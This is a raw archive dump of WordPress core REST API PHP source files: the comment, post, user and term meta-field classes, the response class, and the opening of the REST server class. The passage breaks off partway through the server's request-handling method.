Your IP : 216.73.216.162
fields/class-wp-rest-comment-meta-fields.php��������������������������������������������������������0000666�����������������00000001575�15111427772�0015102 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Comment_Meta_Fields class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class to manage comment meta via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Meta_Fields
*/
class WP_REST_Comment_Meta_Fields extends WP_REST_Meta_Fields {
/**
* Retrieves the object type for comment meta.
*
* @since 4.7.0
*
* @return string The meta type.
*/
protected function get_meta_type() {
return 'comment';
}
/**
* Retrieves the object meta subtype.
*
* @since 4.9.8
*
* @return string 'comment' There are no subtypes.
*/
protected function get_meta_subtype() {
return 'comment';
}
/**
* Retrieves the type for register_rest_field() in the context of comments.
*
* @since 4.7.0
*
* @return string The REST field type.
*/
public function get_rest_field_type() {
return 'comment';
}
}
�����������������������������������������������������������������������������������������������������������������������������������fields/class-wp-rest-meta-fields.php����������������������������������������������������������������0000666�����������������00000032613�15111427772�0013437 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Meta_Fields class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class to manage meta values for an object via the REST API.
*
* @since 4.7.0
*/
abstract class WP_REST_Meta_Fields {
/**
* Retrieves the object meta type.
*
* @since 4.7.0
*
* @return string One of 'post', 'comment', 'term', 'user', or anything
* else supported by `_get_meta_table()`.
*/
abstract protected function get_meta_type();
/**
* Retrieves the object meta subtype.
*
* @since 4.9.8
*
* @return string Subtype for the meta type, or empty string if no specific subtype.
*/
protected function get_meta_subtype() {
return '';
}
/**
* Retrieves the object type for register_rest_field().
*
* @since 4.7.0
*
* @return string The REST field type, such as post type name, taxonomy name, 'comment', or `user`.
*/
abstract protected function get_rest_field_type();
/**
* Registers the meta field.
*
* @since 4.7.0
*
* @see register_rest_field()
*/
public function register_field() {
register_rest_field( $this->get_rest_field_type(), 'meta', array(
'get_callback' => array( $this, 'get_value' ),
'update_callback' => array( $this, 'update_value' ),
'schema' => $this->get_field_schema(),
));
}
/**
* Retrieves the meta field value.
*
* @since 4.7.0
*
* @param int $object_id Object ID to fetch meta for.
* @param WP_REST_Request $request Full details about the request.
* @return WP_Error|object Object containing the meta values by name, otherwise WP_Error object.
*/
public function get_value( $object_id, $request ) {
$fields = $this->get_registered_fields();
$response = array();
foreach ( $fields as $meta_key => $args ) {
$name = $args['name'];
$all_values = get_metadata( $this->get_meta_type(), $object_id, $meta_key, false );
if ( $args['single'] ) {
if ( empty( $all_values ) ) {
$value = $args['schema']['default'];
} else {
$value = $all_values[0];
}
$value = $this->prepare_value_for_response( $value, $request, $args );
} else {
$value = array();
foreach ( $all_values as $row ) {
$value[] = $this->prepare_value_for_response( $row, $request, $args );
}
}
$response[ $name ] = $value;
}
return $response;
}
/**
* Prepares a meta value for a response.
*
* This is required because some native types cannot be stored correctly
* in the database, such as booleans. We need to cast back to the relevant
* type before passing back to JSON.
*
* @since 4.7.0
*
* @param mixed $value Meta value to prepare.
* @param WP_REST_Request $request Current request object.
* @param array $args Options for the field.
* @return mixed Prepared value.
*/
protected function prepare_value_for_response( $value, $request, $args ) {
if ( ! empty( $args['prepare_callback'] ) ) {
$value = call_user_func( $args['prepare_callback'], $value, $request, $args );
}
return $value;
}
/**
* Updates meta values.
*
* @since 4.7.0
*
* @param array $meta Array of meta parsed from the request.
* @param int $object_id Object ID to fetch meta for.
* @return WP_Error|null WP_Error if one occurs, null on success.
*/
public function update_value( $meta, $object_id ) {
$fields = $this->get_registered_fields();
foreach ( $fields as $meta_key => $args ) {
$name = $args['name'];
if ( ! array_key_exists( $name, $meta ) ) {
continue;
}
/*
* A null value means reset the field, which is essentially deleting it
* from the database and then relying on the default value.
*/
if ( is_null( $meta[ $name ] ) ) {
$result = $this->delete_meta_value( $object_id, $meta_key, $name );
if ( is_wp_error( $result ) ) {
return $result;
}
continue;
}
$is_valid = rest_validate_value_from_schema( $meta[ $name ], $args['schema'], 'meta.' . $name );
if ( is_wp_error( $is_valid ) ) {
$is_valid->add_data( array( 'status' => 400 ) );
return $is_valid;
}
$value = rest_sanitize_value_from_schema( $meta[ $name ], $args['schema'] );
if ( $args['single'] ) {
$result = $this->update_meta_value( $object_id, $meta_key, $name, $value );
} else {
$result = $this->update_multi_meta_value( $object_id, $meta_key, $name, $value );
}
if ( is_wp_error( $result ) ) {
return $result;
}
}
return null;
}
/**
* Deletes a meta value for an object.
*
* @since 4.7.0
*
* @param int $object_id Object ID the field belongs to.
* @param string $meta_key Key for the field.
* @param string $name Name for the field that is exposed in the REST API.
* @return bool|WP_Error True if meta field is deleted, WP_Error otherwise.
*/
protected function delete_meta_value( $object_id, $meta_key, $name ) {
$meta_type = $this->get_meta_type();
if ( ! current_user_can( "delete_{$meta_type}_meta", $object_id, $meta_key ) ) {
return new WP_Error(
'rest_cannot_delete',
/* translators: %s: custom field key */
sprintf( __( 'Sorry, you are not allowed to edit the %s custom field.' ), $name ),
array( 'key' => $name, 'status' => rest_authorization_required_code() )
);
}
if ( ! delete_metadata( $meta_type, $object_id, wp_slash( $meta_key ) ) ) {
return new WP_Error(
'rest_meta_database_error',
__( 'Could not delete meta value from database.' ),
array( 'key' => $name, 'status' => WP_Http::INTERNAL_SERVER_ERROR )
);
}
return true;
}
/**
* Updates multiple meta values for an object.
*
* Alters the list of values in the database to match the list of provided values.
*
* @since 4.7.0
*
* @param int $object_id Object ID to update.
* @param string $meta_key Key for the custom field.
* @param string $name Name for the field that is exposed in the REST API.
* @param array $values List of values to update to.
* @return bool|WP_Error True if meta fields are updated, WP_Error otherwise.
*/
protected function update_multi_meta_value( $object_id, $meta_key, $name, $values ) {
$meta_type = $this->get_meta_type();
if ( ! current_user_can( "edit_{$meta_type}_meta", $object_id, $meta_key ) ) {
return new WP_Error(
'rest_cannot_update',
/* translators: %s: custom field key */
sprintf( __( 'Sorry, you are not allowed to edit the %s custom field.' ), $name ),
array( 'key' => $name, 'status' => rest_authorization_required_code() )
);
}
$current = get_metadata( $meta_type, $object_id, $meta_key, false );
$to_remove = $current;
$to_add = $values;
foreach ( $to_add as $add_key => $value ) {
$remove_keys = array_keys( $to_remove, $value, true );
if ( empty( $remove_keys ) ) {
continue;
}
if ( count( $remove_keys ) > 1 ) {
// To remove, we need to remove first, then add, so don't touch.
continue;
}
$remove_key = $remove_keys[0];
unset( $to_remove[ $remove_key ] );
unset( $to_add[ $add_key ] );
}
// `delete_metadata` removes _all_ instances of the value, so only call once.
$to_remove = array_unique( $to_remove );
foreach ( $to_remove as $value ) {
if ( ! delete_metadata( $meta_type, $object_id, wp_slash( $meta_key ), wp_slash( $value ) ) ) {
return new WP_Error(
'rest_meta_database_error',
__( 'Could not update meta value in database.' ),
array( 'key' => $name, 'status' => WP_Http::INTERNAL_SERVER_ERROR )
);
}
}
foreach ( $to_add as $value ) {
if ( ! add_metadata( $meta_type, $object_id, wp_slash( $meta_key ), wp_slash( $value ) ) ) {
return new WP_Error(
'rest_meta_database_error',
__( 'Could not update meta value in database.' ),
array( 'key' => $name, 'status' => WP_Http::INTERNAL_SERVER_ERROR )
);
}
}
return true;
}
/**
* Updates a meta value for an object.
*
* @since 4.7.0
*
* @param int $object_id Object ID to update.
* @param string $meta_key Key for the custom field.
* @param string $name Name for the field that is exposed in the REST API.
* @param mixed $value Updated value.
* @return bool|WP_Error True if the meta field was updated, WP_Error otherwise.
*/
protected function update_meta_value( $object_id, $meta_key, $name, $value ) {
$meta_type = $this->get_meta_type();
if ( ! current_user_can( "edit_{$meta_type}_meta", $object_id, $meta_key ) ) {
return new WP_Error(
'rest_cannot_update',
/* translators: %s: custom field key */
sprintf( __( 'Sorry, you are not allowed to edit the %s custom field.' ), $name ),
array( 'key' => $name, 'status' => rest_authorization_required_code() )
);
}
// Do the exact same check for a duplicate value as in update_metadata() to avoid update_metadata() returning false.
$old_value = get_metadata( $meta_type, $object_id, $meta_key );
$subtype = get_object_subtype( $meta_type, $object_id );
if ( 1 === count( $old_value ) ) {
if ( (string) sanitize_meta( $meta_key, $value, $meta_type, $subtype ) === $old_value[0] ) {
return true;
}
}
if ( ! update_metadata( $meta_type, $object_id, wp_slash( $meta_key ), wp_slash( $value ) ) ) {
return new WP_Error(
'rest_meta_database_error',
__( 'Could not update meta value in database.' ),
array( 'key' => $name, 'status' => WP_Http::INTERNAL_SERVER_ERROR )
);
}
return true;
}
/**
* Retrieves all the registered meta fields.
*
* @since 4.7.0
*
* @return array Registered fields.
*/
protected function get_registered_fields() {
$registered = array();
$meta_type = $this->get_meta_type();
$meta_subtype = $this->get_meta_subtype();
$meta_keys = get_registered_meta_keys( $meta_type );
if ( ! empty( $meta_subtype ) ) {
$meta_keys = array_merge( $meta_keys, get_registered_meta_keys( $meta_type, $meta_subtype ) );
}
foreach ( $meta_keys as $name => $args ) {
if ( empty( $args['show_in_rest'] ) ) {
continue;
}
$rest_args = array();
if ( is_array( $args['show_in_rest'] ) ) {
$rest_args = $args['show_in_rest'];
}
$default_args = array(
'name' => $name,
'single' => $args['single'],
'type' => ! empty( $args['type'] ) ? $args['type'] : null,
'schema' => array(),
'prepare_callback' => array( $this, 'prepare_value' ),
);
$default_schema = array(
'type' => $default_args['type'],
'description' => empty( $args['description'] ) ? '' : $args['description'],
'default' => isset( $args['default'] ) ? $args['default'] : null,
);
$rest_args = array_merge( $default_args, $rest_args );
$rest_args['schema'] = array_merge( $default_schema, $rest_args['schema'] );
$type = ! empty( $rest_args['type'] ) ? $rest_args['type'] : null;
$type = ! empty( $rest_args['schema']['type'] ) ? $rest_args['schema']['type'] : $type;
if ( ! in_array( $type, array( 'string', 'boolean', 'integer', 'number' ) ) ) {
continue;
}
if ( empty( $rest_args['single'] ) ) {
$rest_args['schema']['items'] = array(
'type' => $rest_args['type'],
);
$rest_args['schema']['type'] = 'array';
}
$registered[ $name ] = $rest_args;
}
return $registered;
}
/**
* Retrieves the object's meta schema, conforming to JSON Schema.
*
* @since 4.7.0
*
* @return array Field schema data.
*/
public function get_field_schema() {
$fields = $this->get_registered_fields();
$schema = array(
'description' => __( 'Meta fields.' ),
'type' => 'object',
'context' => array( 'view', 'edit' ),
'properties' => array(),
'arg_options' => array(
'sanitize_callback' => null,
'validate_callback' => array( $this, 'check_meta_is_array' ),
),
);
foreach ( $fields as $args ) {
$schema['properties'][ $args['name'] ] = $args['schema'];
}
return $schema;
}
/**
* Prepares a meta value for output.
*
* Default preparation for meta fields. Override by passing the
* `prepare_callback` in your `show_in_rest` options.
*
* @since 4.7.0
*
* @param mixed $value Meta value from the database.
* @param WP_REST_Request $request Request object.
* @param array $args REST-specific options for the meta key.
* @return mixed Value prepared for output. If a non-JsonSerializable object, null.
*/
public static function prepare_value( $value, $request, $args ) {
$type = $args['schema']['type'];
// For multi-value fields, check the item type instead.
if ( 'array' === $type && ! empty( $args['schema']['items']['type'] ) ) {
$type = $args['schema']['items']['type'];
}
switch ( $type ) {
case 'string':
$value = (string) $value;
break;
case 'integer':
$value = (int) $value;
break;
case 'number':
$value = (float) $value;
break;
case 'boolean':
$value = (bool) $value;
break;
}
// Don't allow objects to be output.
if ( is_object( $value ) && ! ( $value instanceof JsonSerializable ) ) {
return null;
}
return $value;
}
/**
* Check the 'meta' value of a request is an associative array.
*
* @since 4.7.0
*
* @param mixed $value The meta value submitted in the request.
* @param WP_REST_Request $request Full details about the request.
* @param string $param The parameter name.
* @return WP_Error|string The meta array, if valid, otherwise an error.
*/
public function check_meta_is_array( $value, $request, $param ) {
if ( ! is_array( $value ) ) {
return false;
}
return $value;
}
}
���������������������������������������������������������������������������������������������������������������������fields/class-wp-rest-post-meta-fields.php�����������������������������������������������������������0000666�����������������00000002340�15111427772�0014414 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Post_Meta_Fields class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to manage meta values for posts via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Meta_Fields
*/
class WP_REST_Post_Meta_Fields extends WP_REST_Meta_Fields {
/**
* Post type to register fields for.
*
* @since 4.7.0
* @var string
*/
protected $post_type;
/**
* Constructor.
*
* @since 4.7.0
*
* @param string $post_type Post type to register fields for.
*/
public function __construct( $post_type ) {
$this->post_type = $post_type;
}
/**
* Retrieves the object meta type.
*
* @since 4.7.0
*
* @return string The meta type.
*/
protected function get_meta_type() {
return 'post';
}
/**
* Retrieves the object meta subtype.
*
* @since 4.9.8
*
* @return string Subtype for the meta type, or empty string if no specific subtype.
*/
protected function get_meta_subtype() {
return $this->post_type;
}
/**
* Retrieves the type for register_rest_field().
*
* @since 4.7.0
*
* @see register_rest_field()
*
* @return string The REST field type.
*/
public function get_rest_field_type() {
return $this->post_type;
}
}
������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������fields/class-wp-rest-user-meta-fields.php�����������������������������������������������������������0000666�����������������00000001534�15111427772�0014411 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_User_Meta_Fields class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to manage meta values for users via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Meta_Fields
*/
class WP_REST_User_Meta_Fields extends WP_REST_Meta_Fields {
/**
* Retrieves the object meta type.
*
* @since 4.7.0
*
* @return string The user meta type.
*/
protected function get_meta_type() {
return 'user';
}
/**
* Retrieves the object meta subtype.
*
* @since 4.9.8
*
* @return string 'user' There are no subtypes.
*/
protected function get_meta_subtype() {
return 'user';
}
/**
* Retrieves the type for register_rest_field().
*
* @since 4.7.0
*
* @return string The user REST field type.
*/
public function get_rest_field_type() {
return 'user';
}
}
��������������������������������������������������������������������������������������������������������������������������������������������������������������������fields/class-wp-rest-term-meta-fields.php�����������������������������������������������������������0000666�����������������00000002335�15111427772�0014402 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Term_Meta_Fields class
*
* @package WordPress
* @subpackage REST_API
* @since 4.7.0
*/
/**
* Core class used to manage meta values for terms via the REST API.
*
* @since 4.7.0
*
* @see WP_REST_Meta_Fields
*/
class WP_REST_Term_Meta_Fields extends WP_REST_Meta_Fields {
/**
* Taxonomy to register fields for.
*
* @since 4.7.0
* @var string
*/
protected $taxonomy;
/**
* Constructor.
*
* @since 4.7.0
*
* @param string $taxonomy Taxonomy to register fields for.
*/
public function __construct( $taxonomy ) {
$this->taxonomy = $taxonomy;
}
/**
* Retrieves the object meta type.
*
* @since 4.7.0
*
* @return string The meta type.
*/
protected function get_meta_type() {
return 'term';
}
/**
* Retrieves the object meta subtype.
*
* @since 4.9.8
*
* @return string Subtype for the meta type, or empty string if no specific subtype.
*/
protected function get_meta_subtype() {
return $this->taxonomy;
}
/**
* Retrieves the type for register_rest_field().
*
* @since 4.7.0
*
* @return string The REST field type.
*/
public function get_rest_field_type() {
return 'post_tag' === $this->taxonomy ? 'tag' : $this->taxonomy;
}
}
���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������class-wp-rest-response.php��������������������������������������������������������������������������0000666�����������������00000016253�15111427772�0011637 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Response class
*
* @package WordPress
* @subpackage REST_API
* @since 4.4.0
*/
/**
* Core class used to implement a REST response object.
*
* @since 4.4.0
*
* @see WP_HTTP_Response
*/
class WP_REST_Response extends WP_HTTP_Response {
/**
* Links related to the response.
*
* @since 4.4.0
* @var array
*/
protected $links = array();
/**
* The route that was to create the response.
*
* @since 4.4.0
* @var string
*/
protected $matched_route = '';
/**
* The handler that was used to create the response.
*
* @since 4.4.0
* @var null|array
*/
protected $matched_handler = null;
/**
* Adds a link to the response.
*
* @internal The $rel parameter is first, as this looks nicer when sending multiple.
*
* @since 4.4.0
*
* @link https://tools.ietf.org/html/rfc5988
* @link https://www.iana.org/assignments/link-relations/link-relations.xml
*
* @param string $rel Link relation. Either an IANA registered type,
* or an absolute URL.
* @param string $href Target URI for the link.
* @param array $attributes Optional. Link parameters to send along with the URL. Default empty array.
*/
public function add_link( $rel, $href, $attributes = array() ) {
if ( empty( $this->links[ $rel ] ) ) {
$this->links[ $rel ] = array();
}
if ( isset( $attributes['href'] ) ) {
// Remove the href attribute, as it's used for the main URL.
unset( $attributes['href'] );
}
$this->links[ $rel ][] = array(
'href' => $href,
'attributes' => $attributes,
);
}
/**
* Removes a link from the response.
*
* @since 4.4.0
*
* @param string $rel Link relation. Either an IANA registered type, or an absolute URL.
* @param string $href Optional. Only remove links for the relation matching the given href.
* Default null.
*/
public function remove_link( $rel, $href = null ) {
if ( ! isset( $this->links[ $rel ] ) ) {
return;
}
if ( $href ) {
$this->links[ $rel ] = wp_list_filter( $this->links[ $rel ], array( 'href' => $href ), 'NOT' );
} else {
$this->links[ $rel ] = array();
}
if ( ! $this->links[ $rel ] ) {
unset( $this->links[ $rel ] );
}
}
/**
* Adds multiple links to the response.
*
* Link data should be an associative array with link relation as the key.
* The value can either be an associative array of link attributes
* (including `href` with the URL for the response), or a list of these
* associative arrays.
*
* @since 4.4.0
*
* @param array $links Map of link relation to list of links.
*/
public function add_links( $links ) {
foreach ( $links as $rel => $set ) {
// If it's a single link, wrap with an array for consistent handling.
if ( isset( $set['href'] ) ) {
$set = array( $set );
}
foreach ( $set as $attributes ) {
$this->add_link( $rel, $attributes['href'], $attributes );
}
}
}
/**
* Retrieves links for the response.
*
* @since 4.4.0
*
* @return array List of links.
*/
public function get_links() {
return $this->links;
}
/**
* Sets a single link header.
*
* @internal The $rel parameter is first, as this looks nicer when sending multiple.
*
* @since 4.4.0
*
* @link https://tools.ietf.org/html/rfc5988
* @link https://www.iana.org/assignments/link-relations/link-relations.xml
*
* @param string $rel Link relation. Either an IANA registered type, or an absolute URL.
* @param string $link Target IRI for the link.
* @param array $other Optional. Other parameters to send, as an assocative array.
* Default empty array.
*/
public function link_header( $rel, $link, $other = array() ) {
$header = '<' . $link . '>; rel="' . $rel . '"';
foreach ( $other as $key => $value ) {
if ( 'title' === $key ) {
$value = '"' . $value . '"';
}
$header .= '; ' . $key . '=' . $value;
}
$this->header( 'Link', $header, false );
}
/**
* Retrieves the route that was used.
*
* @since 4.4.0
*
* @return string The matched route.
*/
public function get_matched_route() {
return $this->matched_route;
}
/**
* Sets the route (regex for path) that caused the response.
*
* @since 4.4.0
*
* @param string $route Route name.
*/
public function set_matched_route( $route ) {
$this->matched_route = $route;
}
/**
* Retrieves the handler that was used to generate the response.
*
* @since 4.4.0
*
* @return null|array The handler that was used to create the response.
*/
public function get_matched_handler() {
return $this->matched_handler;
}
/**
* Retrieves the handler that was responsible for generating the response.
*
* @since 4.4.0
*
* @param array $handler The matched handler.
*/
public function set_matched_handler( $handler ) {
$this->matched_handler = $handler;
}
/**
* Checks if the response is an error, i.e. >= 400 response code.
*
* @since 4.4.0
*
* @return bool Whether the response is an error.
*/
public function is_error() {
return $this->get_status() >= 400;
}
/**
* Retrieves a WP_Error object from the response.
*
* @since 4.4.0
*
* @return WP_Error|null WP_Error or null on not an errored response.
*/
public function as_error() {
if ( ! $this->is_error() ) {
return null;
}
$error = new WP_Error;
if ( is_array( $this->get_data() ) ) {
$data = $this->get_data();
$error->add( $data['code'], $data['message'], $data['data'] );
if ( ! empty( $data['additional_errors'] ) ) {
foreach( $data['additional_errors'] as $err ) {
$error->add( $err['code'], $err['message'], $err['data'] );
}
}
} else {
$error->add( $this->get_status(), '', array( 'status' => $this->get_status() ) );
}
return $error;
}
/**
* Retrieves the CURIEs (compact URIs) used for relations.
*
* @since 4.5.0
*
* @return array Compact URIs.
*/
public function get_curies() {
$curies = array(
array(
'name' => 'wp',
'href' => 'https://api.w.org/{rel}',
'templated' => true,
),
);
/**
* Filters extra CURIEs available on API responses.
*
* CURIEs allow a shortened version of URI relations. This allows a more
* usable form for custom relations than using the full URI. These work
* similarly to how XML namespaces work.
*
* Registered CURIES need to specify a name and URI template. This will
* automatically transform URI relations into their shortened version.
* The shortened relation follows the format `{name}:{rel}`. `{rel}` in
* the URI template will be replaced with the `{rel}` part of the
* shortened relation.
*
* For example, a CURIE with name `example` and URI template
* `http://w.org/{rel}` would transform a `http://w.org/term` relation
* into `example:term`.
*
* Well-behaved clients should expand and normalise these back to their
* full URI relation, however some naive clients may not resolve these
* correctly, so adding new CURIEs may break backward compatibility.
*
* @since 4.5.0
*
* @param array $additional Additional CURIEs to register with the API.
*/
$additional = apply_filters( 'rest_response_link_curies', array() );
return array_merge( $curies, $additional );
}
}
�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������class-wp-rest-server.php����������������������������������������������������������������������������0000666�����������������00000113670�15111427772�0011310 0����������������������������������������������������������������������������������������������������ustar�00�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������<?php
/**
* REST API: WP_REST_Server class
*
* @package WordPress
* @subpackage REST_API
* @since 4.4.0
*/
/**
* Core class used to implement the WordPress REST API server.
*
* @since 4.4.0
*/
class WP_REST_Server {
/**
* Alias for GET transport method.
*
* @since 4.4.0
* @var string
*/
const READABLE = 'GET';
/**
* Alias for POST transport method.
*
* @since 4.4.0
* @var string
*/
const CREATABLE = 'POST';
/**
* Alias for POST, PUT, PATCH transport methods together.
*
* @since 4.4.0
* @var string
*/
const EDITABLE = 'POST, PUT, PATCH';
/**
* Alias for DELETE transport method.
*
* @since 4.4.0
* @var string
*/
const DELETABLE = 'DELETE';
/**
* Alias for GET, POST, PUT, PATCH & DELETE transport methods together.
*
* @since 4.4.0
* @var string
*/
const ALLMETHODS = 'GET, POST, PUT, PATCH, DELETE';
/**
* Namespaces registered to the server.
*
* @since 4.4.0
* @var array
*/
protected $namespaces = array();
/**
* Endpoints registered to the server.
*
* @since 4.4.0
* @var array
*/
protected $endpoints = array();
/**
* Options defined for the routes.
*
* @since 4.4.0
* @var array
*/
protected $route_options = array();
/**
* Instantiates the REST server.
*
* @since 4.4.0
*/
public function __construct() {
$this->endpoints = array(
// Meta endpoints.
'/' => array(
'callback' => array( $this, 'get_index' ),
'methods' => 'GET',
'args' => array(
'context' => array(
'default' => 'view',
),
),
),
);
}
/**
* Checks the authentication headers if supplied.
*
* @since 4.4.0
*
* @return WP_Error|null WP_Error indicates unsuccessful login, null indicates successful
* or no authentication provided
*/
public function check_authentication() {
/**
* Filters REST authentication errors.
*
* This is used to pass a WP_Error from an authentication method back to
* the API.
*
* Authentication methods should check first if they're being used, as
* multiple authentication methods can be enabled on a site (cookies,
* HTTP basic auth, OAuth). If the authentication method hooked in is
* not actually being attempted, null should be returned to indicate
* another authentication method should check instead. Similarly,
* callbacks should ensure the value is `null` before checking for
* errors.
*
* A WP_Error instance can be returned if an error occurs, and this should
* match the format used by API methods internally (that is, the `status`
* data should be used). A callback can return `true` to indicate that
* the authentication method was used, and it succeeded.
*
* @since 4.4.0
*
* @param WP_Error|null|bool WP_Error if authentication error, null if authentication
* method wasn't used, true if authentication succeeded.
*/
return apply_filters( 'rest_authentication_errors', null );
}
/**
* Converts an error to a response object.
*
* This iterates over all error codes and messages to change it into a flat
* array. This enables simpler client behaviour, as it is represented as a
* list in JSON rather than an object/map.
*
* @since 4.4.0
*
* @param WP_Error $error WP_Error instance.
* @return WP_REST_Response List of associative arrays with code and message keys.
*/
protected function error_to_response( $error ) {
$error_data = $error->get_error_data();
if ( is_array( $error_data ) && isset( $error_data['status'] ) ) {
$status = $error_data['status'];
} else {
$status = 500;
}
$errors = array();
foreach ( (array) $error->errors as $code => $messages ) {
foreach ( (array) $messages as $message ) {
$errors[] = array( 'code' => $code, 'message' => $message, 'data' => $error->get_error_data( $code ) );
}
}
$data = $errors[0];
if ( count( $errors ) > 1 ) {
// Remove the primary error.
array_shift( $errors );
$data['additional_errors'] = $errors;
}
$response = new WP_REST_Response( $data, $status );
return $response;
}
/**
* Retrieves an appropriate error representation in JSON.
*
* Note: This should only be used in WP_REST_Server::serve_request(), as it
* cannot handle WP_Error internally. All callbacks and other internal methods
* should instead return a WP_Error with the data set to an array that includes
* a 'status' key, with the value being the HTTP status to send.
*
* @since 4.4.0
*
* @param string $code WP_Error-style code.
* @param string $message Human-readable message.
* @param int $status Optional. HTTP status code to send. Default null.
* @return string JSON representation of the error
*/
protected function json_error( $code, $message, $status = null ) {
if ( $status ) {
$this->set_status( $status );
}
$error = compact( 'code', 'message' );
return wp_json_encode( $error );
}
/**
* Handles serving an API request.
*
* Matches the current server URI to a route and runs the first matching
* callback then outputs a JSON representation of the returned value.
*
* @since 4.4.0
*
* @see WP_REST_Server::dispatch()
*
* @param string $path Optional. The request route. If not set, `$_SERVER['PATH_INFO']` will be used.
* Default null.
* @return false|null Null if not served and a HEAD request, false otherwise.
*/
public function serve_request( $path = null ) {
$content_type = isset( $_GET['_jsonp'] ) ? 'application/javascript' : 'application/json';
$this->send_header( 'Content-Type', $content_type . '; charset=' . get_option( 'blog_charset' ) );
$this->send_header( 'X-Robots-Tag', 'noindex' );
$api_root = get_rest_url();
if ( ! empty( $api_root ) ) {
$this->send_header( 'Link', '<' . esc_url_raw( $api_root ) . '>; rel="https://api.w.org/"' );
}
/*
* Mitigate possible JSONP Flash attacks.
*
* https://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/
*/
$this->send_header( 'X-Content-Type-Options', 'nosniff' );
$this->send_header( 'Access-Control-Expose-Headers', 'X-WP-Total, X-WP-TotalPages' );
$this->send_header( 'Access-Control-Allow-Headers', 'Authorization, Content-Type' );
/**
* Filters whether the REST API is enabled.
*
* @since 4.4.0
* @deprecated 4.7.0 Use the rest_authentication_errors filter to restrict access to the API
*
* @param bool $rest_enabled Whether the REST API is enabled. Default true.
*/
apply_filters_deprecated( 'rest_enabled', array( true ), '4.7.0', 'rest_authentication_errors',
__( 'The REST API can no longer be completely disabled, the rest_authentication_errors filter can be used to restrict access to the API, instead.' )
);
/**
* Filters whether jsonp is enabled.
*
* @since 4.4.0
*
* @param bool $jsonp_enabled Whether jsonp is enabled. Default true.
*/
$jsonp_enabled = apply_filters( 'rest_jsonp_enabled', true );
$jsonp_callback = null;
if ( isset( $_GET['_jsonp'] ) ) {
if ( ! $jsonp_enabled ) {
echo $this->json_error( 'rest_callback_disabled', __( 'JSONP support is disabled on this site.' ), 400 );
return false;
}
$jsonp_callback = $_GET['_jsonp'];
if ( ! wp_check_jsonp_callback( $jsonp_callback ) ) {
echo $this->json_error( 'rest_callback_invalid', __( 'Invalid JSONP callback function.' ), 400 );
return false;
}
}
if ( empty( $path ) ) {
if ( isset( $_SERVER['PATH_INFO'] ) ) {
$path = $_SERVER['PATH_INFO'];
} else {
$path = '/';
}
}
$request = new WP_REST_Request( $_SERVER['REQUEST_METHOD'], $path );
$request->set_query_params( wp_unslash( $_GET ) );
$request->set_body_params( wp_unslash( $_POST ) );
$request->set_file_params( $_FILES );
$request->set_headers( $this->get_headers( wp_unslash( $_SERVER ) ) );
$request->set_body( $this->get_raw_data() );
/*
* HTTP method override for clients that can't use PUT/PATCH/DELETE. First, we check
* $_GET['_method']. If that is not set, we check for the HTTP_X_HTTP_METHOD_OVERRIDE
* header.
*/
$method_overridden = false;
if ( isset( $_GET['_method'] ) ) {
$request->set_method( $_GET['_method'] );
} elseif ( isset( $_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'] ) ) {
$request->set_method( $_SERVER['HTTP_X_HTTP_METHOD_OVERRIDE'] );
$method_overridden = true;
}
$result = $this->check_authentication();
if ( ! is_wp_error( $result ) ) {
$result = $this->dispatch( $request );
}
// Normalize to either WP_Error or WP_REST_Response...
$result = rest_ensure_response( $result );
// ...then convert WP_Error across.
if ( is_wp_error( $result ) ) {
$result = $this->error_to_response( $result );
}
/**
* Filters the API response.
*
* Allows modification of the response before returning.
*
* @since 4.4.0
* @since 4.5.0 Applied to embedded responses.
*
* @param WP_HTTP_Response $result Result to send to the client. Usually a WP_REST_Response.
* @param WP_REST_Server $this Server instance.
* @param WP_REST_Request $request Request used to generate the response.
*/
$result = apply_filters( 'rest_post_dispatch', rest_ensure_response( $result ), $this, $request );
// Wrap the response in an envelope if asked for.
if ( isset( $_GET['_envelope'] ) ) {
$result = $this->envelope_response( $result, isset( $_GET['_embed'] ) );
}
// Send extra data from response objects.
$headers = $result->get_headers();
$this->send_headers( $headers );
$code = $result->get_status();
$this->set_status( $code );
/**
* Filters whether the request has already been served.
*
* Allow sending the request manually - by returning true, the API result
* will not be sent to the client.
*
* @since 4.4.0
*
* @param bool $served Whether the request has already been served.
* Default false.
* @param WP_HTTP_Response $result Result to send to the client. Usually a WP_REST_Response.
* @param WP_REST_Request $request Request used to generate the response.
* @param WP_REST_Server $this Server instance.
*/
$served = apply_filters( 'rest_pre_serve_request', false, $result, $request, $this );
/**
* Filters whether to send nocache headers on a REST API request.
*
* @since 4.4.0
* @since 6.x.x Moved the block to catch the filter added on rest_cookie_check_errors() from rest-api.php
*
* @param bool $rest_send_nocache_headers Whether to send no-cache headers.
*/
